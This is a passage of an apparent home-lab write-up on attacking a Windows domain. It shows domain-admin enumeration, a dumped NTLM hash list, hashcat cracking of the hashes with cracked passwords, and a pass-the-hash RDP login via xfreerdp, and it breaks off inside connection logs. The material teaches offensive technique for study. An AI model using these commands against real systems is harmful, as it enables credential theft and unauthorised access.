C:\Windows\system32>net group "domain admins" net group "domain admins" Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- Administrator fern.scott jace.le The command completed successfully.
Gaining access
As previously mentioned, I wanted to access the desktop environment, so it is easy for me to look around the computer. I figured I should stick with my first instinct and what I knew to save time.
There are four options that I could think of to get access to the desktop environment with a user account. One option is to crack the password. However, I did not know the hashdump
command at the time.
The second option is to create a new account. It is one of the adversaries' tactics they perform to establish persistence. At the time, I was not thinking about this, so I went with the last option.
The third option is to pass the hash method. At the time, I did not know how to do this. In this article, we will explore this option.
The last option is to change the account's password. At the time, I thought it was a good idea since this is not production anyway. In real life, your adversaries will try their best not to get caught, so this is not the option they will use.
Password cracking
Before attempting to crack the passwords, it might be worth discussing Windows passwords a little bit. The earlier versions of Windows used LAN Manager (LANMAN or LM) to generate password hashes. Eventually, Microsoft switched to using NT hash starting Windows 2000, at least according to my limited research.
With the switch to New Technology LAN Manager (NTLM), the format that you would see on hashdump
or a similar tool will look like this: username:userid:LMHASH:NTHASH.
Some Windows versions used LM hash when the password's length was under 15 characters. Windows eventually dropped the use of LM hash by default in the later versions.
It is good to know which hashes are of no use to you before cracking passwords. Accounts with hash values that are the same as the example below represent an empty password. It means that the accounts are not allowed for authentication.
Let's take the guest account, for example. This account has an empty LANMAN and NT hash, which means it has no use for us. We can identify this by using a mnemonic. For the LM hash part, use the Am All Day Baffled By. For the NT hash part, use the Difficult Choices For Encrypted Data. I am sure there are different mnemonic, but I use this.
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
We can safely ignore accounts with empty LM and NT hashes. Additionally, if the LM hashes match our mnemonic, we do not have to crack them. Since our example above has empty LM hashes, we will concentrate on the NT hashes.
I took the hashdump output and put all its contents on a file.
andrew@kali:~$ cat hashes
andrew@kali:~$ cat hashes Administrator:500:aad3b435b51404eeaad3b435b51404ee:a44b8c433cb56c8d8ad27f7f4df44ab6::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:bc5cd4292afb61d1ffe517a2637860ad::: summer.sloan:1112:aad3b435b51404eeaad3b435b51404ee:f3fe9e6330783d307510cc18645b1d0f::: darcy.roman:1113:aad3b435b51404eeaad3b435b51404ee:d33b15ba0f27dbf0fd56cd54b1db1ade::: troy.yates:1114:aad3b435b51404eeaad3b435b51404ee:e08847c1090227cb3a9ad59893094b32::: eve.barr:1115:aad3b435b51404eeaad3b435b51404ee:9a1bece5360ef81d379470d065f95562::: max.clark:1116:aad3b435b51404eeaad3b435b51404ee:308c4a9a9120c711cfb117ec019e1a9a::: sally.bird:1117:aad3b435b51404eeaad3b435b51404ee:77a7ad444bf629952a9dc8cc2adcf0e5::: jessy.rogers:1118:aad3b435b51404eeaad3b435b51404ee:83ccff469a423cb19d391a5fd0b61c28::: yoder.mullins:1119:aad3b435b51404eeaad3b435b51404ee:4fc7ba2babad8553ef6bf7f9f706b128::: jace.le:1120:aad3b435b51404eeaad3b435b51404ee:38597e7e9feaeefd8135f9bc981b7499::: fern.scott:1121:aad3b435b51404eeaad3b435b51404ee:61cedcc6b3f7104ded374fd8fb29b0a4::: admin.local:1122:aad3b435b51404eeaad3b435b51404ee:699b68000f83d0ce2070a7d3868bee59::: CAYENNE$:1002:aad3b435b51404eeaad3b435b51404ee:e431643467fea33be6f3f3604dcb21f0::: ANAHEIM$:1123:aad3b435b51404eeaad3b435b51404ee:96e684520b474d918ca28f96f22e9337:::
Then, I used the cut
command utility to remove fields that I did not want in another file.
andrew@kali:~$ cat hashes | cut -d ':' -f 1,4
andrew@kali:~$ cat hashes | cut -d ':' -f 1,4 Administrator:a44b8c433cb56c8d8ad27f7f4df44ab6 Guest:31d6cfe0d16ae931b73c59d7e0c089c0 krbtgt:bc5cd4292afb61d1ffe517a2637860ad summer.sloan:f3fe9e6330783d307510cc18645b1d0f darcy.roman:d33b15ba0f27dbf0fd56cd54b1db1ade troy.yates:e08847c1090227cb3a9ad59893094b32 eve.barr:9a1bece5360ef81d379470d065f95562 max.clark:308c4a9a9120c711cfb117ec019e1a9a sally.bird:77a7ad444bf629952a9dc8cc2adcf0e5 jessy.rogers:83ccff469a423cb19d391a5fd0b61c28 yoder.mullins:4fc7ba2babad8553ef6bf7f9f706b128 jace.le:38597e7e9feaeefd8135f9bc981b7499 fern.scott:61cedcc6b3f7104ded374fd8fb29b0a4 admin.local:699b68000f83d0ce2070a7d3868bee59 CAYENNE$:e431643467fea33be6f3f3604dcb21f0 ANAHEIM$:96e684520b474d918ca28f96f22e9337
Additionally, I took out the accounts that I did not want to crack.
andrew@kali:~$ cat hash
andrew@kali:~$ cat hash Administrator:a44b8c433cb56c8d8ad27f7f4df44ab6 summer.sloan:f3fe9e6330783d307510cc18645b1d0f darcy.roman:d33b15ba0f27dbf0fd56cd54b1db1ade troy.yates:e08847c1090227cb3a9ad59893094b32 eve.barr:9a1bece5360ef81d379470d065f95562 max.clark:308c4a9a9120c711cfb117ec019e1a9a sally.bird:77a7ad444bf629952a9dc8cc2adcf0e5 jessy.rogers:83ccff469a423cb19d391a5fd0b61c28 yoder.mullins:4fc7ba2babad8553ef6bf7f9f706b128 jace.le:38597e7e9feaeefd8135f9bc981b7499 fern.scott:61cedcc6b3f7104ded374fd8fb29b0a4 admin.local:699b68000f83d0ce2070a7d3868bee59
Let's get cracking
We are now ready to use hashcat to crack the hashes. Since we are cracking NT hash, we will use hash mode 1000, NTLM in hashcat's terminology. For the attack mode, we will use the brute force method. Additionally, since we also included the username in the hash file, we need to tell hashcat to exclude it when cracking.
andrew@kali:~$ hashcat -m 1000 -a 0 hash /usr/share/wordlists/rockyou.txt --username --separator ":"
andrew@kali:~$ hashcat -m 1000 -a 0 hash /usr/share/wordlists/rockyou.txt --username --separator ":" hashcat (v6.1.1) starting... OpenCL API (OpenCL 2.0 pocl 1.8 Linux, None+Asserts, RELOC, LLVM 9.0.1, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project] ==================================================================================================================================== * Device #1: pthread-Intel(R) Core(TM) i7-10710U CPU @ 1.10GHz, 1422/1486 MB (512 MB allocatable), 1MCU Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256 Hashes: 12 digests; 12 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Applicable optimizers applied: * Zero-Byte * Early-Skip * Not-Salted * Not-Iterated * Single-Salt * Raw-Hash ATTENTION! Pure (unoptimized) backend kernels selected. Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance. If you want to switch to optimized backend kernels, append -O to your commandline. See the above message to find out about the exact limits. Watchdog: Hardware monitoring interface not found on your system. Watchdog: Temperature abort trigger disabled. Host memory required for this attack: 64 MB Dictionary cache hit: * Filename..: /usr/share/wordlists/rockyou.txt * Passwords.: 14344385 * Bytes.....: 139921507 * Keyspace..: 14344385 f3fe9e6330783d307510cc18645b1d0f:butterfly e08847c1090227cb3a9ad59893094b32:tinkerbell d33b15ba0f27dbf0fd56cd54b1db1ade:spongebob 9a1bece5360ef81d379470d065f95562:dolphins 308c4a9a9120c711cfb117ec019e1a9a:asdfghjkl 83ccff469a423cb19d391a5fd0b61c28:ladybug 77a7ad444bf629952a9dc8cc2adcf0e5:popcorn 4fc7ba2babad8553ef6bf7f9f706b128:margarita 38597e7e9feaeefd8135f9bc981b7499:nikita Approaching final keyspace - workload adjusted. Session..........: hashcat Status...........: Exhausted Hash.Name........: NTLM Hash.Target......: hash Time.Started.....: Wed Dec 16 19:46:53 2021 (4 secs) Time.Estimated...: Wed Dec 16 19:46:57 2021 (0 secs) Guess.Base.......: File (/usr/share/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 4568.0 kH/s (0.12ms) @ Accel:1024 Loops:1 Thr:1 Vec:8 Recovered........: 9/12 (75.00%) Digests Progress.........: 14344385/14344385 (100.00%) Rejected.........: 0/14344385 (0.00%) Restore.Point....: 14344385/14344385 (100.00%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidates.#1....: $HEX[206b72697374656e616e6e65] -> $HEX[042a0337c2a156616d6f732103] Started: Wed Dec 16 19:46:53 2021 Stopped: Wed Dec 16 19:46:58 2021
As you can see from the output above, it is hard to tell which accounts we have access to now. We can issue another command to line up the cracked passwords with the username.
andrew@kali:~$ hashcat -m 1000 -a 0 hash /usr/share/wordlists/rockyou.txt --username --separator ":" --show
andrew@kali:~$ hashcat -m 1000 -a 0 hash /usr/share/wordlists/rockyou.txt --username --separator ":" --show summer.sloan:f3fe9e6330783d307510cc18645b1d0f:butterfly darcy.roman:d33b15ba0f27dbf0fd56cd54b1db1ade:spongebob troy.yates:e08847c1090227cb3a9ad59893094b32:tinkerbell eve.barr:9a1bece5360ef81d379470d065f95562:dolphins max.clark:308c4a9a9120c711cfb117ec019e1a9a:asdfghjkl sally.bird:77a7ad444bf629952a9dc8cc2adcf0e5:popcorn jessy.rogers:83ccff469a423cb19d391a5fd0b61c28:ladybug yoder.mullins:4fc7ba2babad8553ef6bf7f9f706b128:margarita jace.le:38597e7e9feaeefd8135f9bc981b7499:nikita
It looks like jace.le is using a weak password, and since this account has administrator-level access, we can use it to connect via RDP.
Pass the hash
If we opt for the pass the hash approach to access the desktop via RDP, we need to gather some information. We need the username, NT hash, domain name, and target's IP address for us to connect.
Our Nmap results already revealed the domain name, so we are good to go. If we ran a different Nmap command option, we would not have the domain name. In that case, we can use the command shell to gather this information.
C:\Windows\system32>systeminfo | findstr /B Domain systeminfo | findstr /B Domain Domain: scoville.local
RDP access via pass the hash
Since we have the necessary information, we are ready to access the desktop via RDP. There are two RDP software clients available in Kali Linux: xfreerdp
and rdesktop
. As far as I know, rdesktop
does not allow the pass-the-hash option, but xfreerdp
does. That said, we are going to use it for this task.
The command, as shown below, is self-explanatory, so we are not going to discuss what each command option does.
andrew@kali:~$ xfreerdp /u:Administrator /d:scoville.local /pth:a44b8c433cb56c8d8ad27f7f4df44ab6 /v:172.20.20.37
andrew@kali:~$ xfreerdp /u:Administrator /d:scoville.local /pth:a44b8c433cb56c8d8ad27f7f4df44ab6 /v:172.20.20.37 [19:05:52:302] [820544:820545] [INFO][com.freerdp.core] - freerdp_connect:freerdp_set_last_error_ex resetting error state [19:05:52:302] [820544:820545] [INFO][com.freerdp.client.common.cmdline] - loading channelEx rdpdr [19:05:52:302] [820544:820545] [INFO][com.freerdp.client.common.cmdline] - loading channelEx rdpsnd [19:05:52:302] [820544:820545] [INFO][com.freerdp.client.common.cmdline] - loading channelEx cliprdr [19:05:52:612] [820544:820545] [INFO][com.freerdp.primitives] - primitives autodetect, using optimized [19:05:52:622] [820544:820545] [INFO][com.freerdp.core] - freerdp_tcp_is_hostname_resolvable:freerdp_set_last_error_ex resetting error state [19:05:52:628] [820544:820545] [INFO][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex resetting error state [19:05:52:659] [820544:820545] [WARN][com.freerdp.crypto] - Certificate verification failure 'self signed certificate (18)' at stack position 0 [19:05:52:659] [820544:820545] [WARN][com.freerdp.crypto] - CN = cayenne.scoville.local [19:05:52:659] [820544:820545] [INFO][com.winpr.sspi.NTLM] - VERSION ={ [19:05:52:659] [820544:820545] [INFO][com.winpr.sspi.NTLM] - ProductMajorVersion: 6 [19:05:52:659] [820544:820545] [INFO][com.winpr.sspi.NTLM] - ProductMinorVersion: 1 [19:05:52:659] [820544:820545] [INFO][com.winpr.sspi.NTLM] - ProductBuild: 7601 [19:05:52:659] [820544:820545] [INFO][com.winpr.sspi.NTLM] - Reserved: 0x000000 [19:05:52:659] [820544:820545] [INFO][com.winpr.sspi.NTLM] - NTLMRevisionCurrent: 0x0F [19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - negotiateFlags "0xE2898235" [19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - NTLMSSP_NEGOTIATE_56 (0), [19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - NTLMSSP_NEGOTIATE_KEY_EXCH (1), [19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - NTLMSSP_NEGOTIATE_128 (2), [19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - NTLMSSP_NEGOTIATE_VERSION (6), [19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - NTLMSSP_NEGOTIATE_TARGET_INFO (8), [19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - NTLMSSP_NEGOTIATE_EXTENDED_SESSION_SECURITY (12), [19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - NTLMSSP_TARGET_TYPE_DOMAIN (15), [19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - NTLMSSP_NEGOTIATE_ALWAYS_SIGN (16), [19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - NTLMSSP_NEGOTIATE_NTLM (22), [19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - NTLMSSP_NEGOTIATE_SEAL (26), [19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - NTLMSSP_NEGOTIATE_SIGN (27), [19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - NTLMSSP_REQUEST_TARGET (29), [19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - NTLMSSP_NEGOTIATE_UNICODE (31), [19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - VERSION ={ [19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - ProductMajorVersion: 6 [19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - ProductMinorVersion: 3 [19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - ProductBuild: 9600 [19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - Reserved: 0x000000 [19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - NTLMRevisionCurrent: 0x0F [19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - AV_PAIRs = [19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - MsvAvNbDomainName AvId: 2 AvLen: 1980911088 [19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0000 53 00 43 00 4f 00 56 00 49 00 4c 00 4c 00 45 00 S.C.O.V.I.L.L.E. [19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - [length=16] [19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - MsvAvNbComputerName AvId: 1 AvLen: 1980911088 [19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0000 43 00 41 00 59 00 45 00 4e 00 4e 00 45 00 C.A.Y.E.N.N.E. [19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - [length=14] [19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - MsvAvDnsDomainName AvId: 4 AvLen: 1980911088 [19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0000 73 00 63 00 6f 00 76 00 69 00 6c 00 6c 00 65 00 s.c.o.v.i.l.l.e. [19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0016 2e 00 6c 00 6f 00 63 00 61 00 6c 00 ..l.o.c.a.l. [19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - [length=28] [19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - MsvAvDnsComputerName AvId: 3 AvLen: 1980911088 [19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0000 63 00 61 00 79 00 65 00 6e 00 6e 00 65 00 2e 00 c.a.y.e.n.n.e... [19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0016 73 00 63 00 6f 00 76 00 69 00 6c 00 6c 00 65 00 s.c.o.v.i.l.l.e. [19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0032 2e 00 6c 00 6f 00 63 00 61 00 6c 00 ..l.o.c.a.l. [19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - [length=44] [19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - MsvAvDnsTreeName AvId: 5 AvLen: 1980911088 [19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0000 73 00 63 00 6f 00 76 00 69 00 6c 00 6c 00 65 00 s.c.o.v.i.l.l.e. [19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0016 2e 00 6c 00 6f 00 63 00 61 00 6c 00 ..l.o.c.a.l. [19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - [length=28] [19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - MsvAvTimestamp AvId: 7 AvLen: 1980911088 [19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0000 0e 61 c2 4d 65 f2 d7 01 .a.Me... [19:05:52:760] [820544:820545] [INFO][com.winpr.sspi.NTLM] - [length=8] [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - negotiateFlags "0xE288B235" [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - NTLMSSP_NEGOTIATE_56 (0), [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - NTLMSSP_NEGOTIATE_KEY_EXCH (1), [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - NTLMSSP_NEGOTIATE_128 (2), [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - NTLMSSP_NEGOTIATE_VERSION (6), [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - NTLMSSP_NEGOTIATE_TARGET_INFO (8), [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - NTLMSSP_NEGOTIATE_EXTENDED_SESSION_SECURITY (12), [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - NTLMSSP_NEGOTIATE_ALWAYS_SIGN (16), [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - NTLMSSP_NEGOTIATE_WORKSTATION_SUPPLIED (18), [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - NTLMSSP_NEGOTIATE_DOMAIN_SUPPLIED (19), [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - NTLMSSP_NEGOTIATE_NTLM (22), [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - NTLMSSP_NEGOTIATE_SEAL (26), [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - NTLMSSP_NEGOTIATE_SIGN (27), [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - NTLMSSP_REQUEST_TARGET (29), [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - NTLMSSP_NEGOTIATE_UNICODE (31), [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - VERSION ={ [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - ProductMajorVersion: 6 [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - ProductMinorVersion: 1 [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - ProductBuild: 7601 [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - Reserved: 0x000000 [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - NTLMRevisionCurrent: 0x0F [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - AV_PAIRs = [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - MsvAvNbDomainName AvId: 2 AvLen: 1980911088 [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0000 53 00 43 00 4f 00 56 00 49 00 4c 00 4c 00 45 00 S.C.O.V.I.L.L.E. [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - [length=16] [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - MsvAvNbComputerName AvId: 1 AvLen: 1980911088 [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0000 43 00 41 00 59 00 45 00 4e 00 4e 00 45 00 C.A.Y.E.N.N.E. [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - [length=14] [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - MsvAvDnsDomainName AvId: 4 AvLen: 1980911088 [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0000 73 00 63 00 6f 00 76 00 69 00 6c 00 6c 00 65 00 s.c.o.v.i.l.l.e. [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0016 2e 00 6c 00 6f 00 63 00 61 00 6c 00 ..l.o.c.a.l. [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - [length=28] [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - MsvAvDnsComputerName AvId: 3 AvLen: 1980911088 [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0000 63 00 61 00 79 00 65 00 6e 00 6e 00 65 00 2e 00 c.a.y.e.n.n.e... [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0016 73 00 63 00 6f 00 76 00 69 00 6c 00 6c 00 65 00 s.c.o.v.i.l.l.e. [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0032 2e 00 6c 00 6f 00 63 00 61 00 6c 00 ..l.o.c.a.l. [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - [length=44] [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - MsvAvDnsTreeName AvId: 5 AvLen: 1980911088 [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0000 73 00 63 00 6f 00 76 00 69 00 6c 00 6c 00 65 00 s.c.o.v.i.l.l.e. [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0016 2e 00 6c 00 6f 00 63 00 61 00 6c 00 ..l.o.c.a.l. [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - [length=28] [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - MsvAvTimestamp AvId: 7 AvLen: 1980911088 [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0000 0e 61 c2 4d 65 f2 d7 01 .a.Me... [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - [length=8] [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - MsvAvFlags AvId: 6 AvLen: 1980911088 [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0000 02 00 00 00 .... [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - [length=4] [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - MsvChannelBindings AvId: 10 AvLen: 1980911088 [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - [length=16] [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - MsvAvTargetName AvId: 9 AvLen: 1980911088 [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0000 54 00 45 00 52 00 4d 00 53 00 52 00 56 00 2f 00 T.E.R.M.S.R.V./. [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0016 31 00 37 00 32 00 2e 00 32 00 30 00 2e 00 32 00 1.7.2...2.0...2. [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - 0032 30 00 2e 00 33 00 37 00 0...3.7. [19:05:52:762] [820544:820545] [INFO][com.winpr.sspi.NTLM] - [length=40] [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - Receiving [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - ShareCapabilitySet (length 4): [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - nodeId: 0x03EA [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad2Octets: 0x0000 [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - Receiving [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - GeneralCapabilitySet (length 20): [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - osMajorType: 0x0001 [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - osMinorType: 0x0003 [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - protocolVersion: 0x0200 [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad2OctetsA: 0x0000 [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - generalCompressionTypes: 0x0000 [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - extraFlags: 0x041D [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - updateCapabilityFlag: 0x0000 [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - remoteUnshareFlag: 0x0000 [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - generalCompressionLevel: 0x0000 [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - refreshRectSupport: 0x01 [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - suppressOutputSupport: 0x01 [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - Receiving [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - VirtualChannelCapabilitySet (length 8): [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - flags: 0x00000002 [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - VCChunkSize: 0x00000640 [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - Receiving [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - FontCapabilitySet (length 4): [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - fontSupportFlags: 0x0001 [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad2Octets: 0x0000 [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - Receiving [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - BitmapCapabilitySet (length 24): [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - preferredBitsPerPixel: 0x0010 [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - receive1BitPerPixel: 0x0001 [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - receive4BitsPerPixel: 0x0001 [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - receive8BitsPerPixel: 0x0001 [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - desktopWidth: 0x0400 [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - desktopHeight: 0x0300 [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad2Octets: 0x0000 [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - desktopResizeFlag: 0x0001 [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - bitmapCompressionFlag: 0x0001 [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - highColorFlags: 0x00 [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - drawingFlags: 0x1E [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - multipleRectangleSupport: 0x0001 [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - pad2OctetsB: 0x0000 [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - Receiving [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - BitmapCodecsCapabilitySet (length 92): [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - bitmapCodecCount: 4 [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - codecGuid: 0x [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - CA8D1BB9000F154F589FAE2D1A87E2D6 [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - (CODEC_GUID_NSCODEC) [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - codecId: 0 [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - codecPropertiesLength: 3 [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - codecGuid: 0x [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 76772F12BD724463AFB3B73C9C6F7886 [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - (CODEC_GUID_REMOTEFX) [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - codecId: 0 [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - codecPropertiesLength: 4 [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - codecGuid: 0x [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - 9C4351A6353542AE910CCDFCE5760B58 [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - (CODEC_GUID_IGNORE) [19:05:54:968] [820544:820545] [INFO][com.freerdp.core.capabilities] - codecId: 